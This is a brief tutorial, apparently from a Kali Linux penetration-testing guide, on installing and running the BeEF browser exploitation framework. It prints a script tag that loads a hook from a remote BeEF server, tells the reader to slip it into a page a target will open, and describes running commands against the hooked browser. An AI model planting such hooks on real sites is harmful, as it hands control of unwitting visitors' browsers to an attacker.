BeEF stands for Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. BeEF allows the professional penetration tester to assess the actual security posture of a target environment using client-side attack vectors.
First, you have to update the Kali package using the following commands −
root@kali:/# apt-get updateroot@kali:/# apt-get install beef-xss
To start, use the following command −
root@kali:/# cd /usr/share/beef-xssroot@kali:/# ./beef
Open the browser and enter the username and password: beef.
The BeEF hook is a JavaScript file hosted on the BeEF server that needs to run on client browsers. When it does, it calls back to the BeEF server communicating a lot of information about the target. It also allows additional commands and modules to be ran against the target. In this example, the location of BeEF hook is at http://192.168.1.101:3000/hook.js.
In order to attack a browser, include the JavaScript hook in a page that the client will view. There are a number of ways to do that, however the easiest is to insert the following into a page and somehow get the client to open it.
<script src = "http://192.168.1.101:3000/hook.js" type = "text/javascript"></script>
Once the page loads, go back to the BeEF Control Panel and click “Online Browsers” on the top left. After a few seconds, you should see your IP address pop-up representing a hooked browser. Hovering over the IP will quickly provide information such as the browser version, operating system, and what plugins are installed.
To remotely run the command, click the “Owned” host. Then, on the command click the module that you want to execute, and finally click “Execute”.
COMMENTS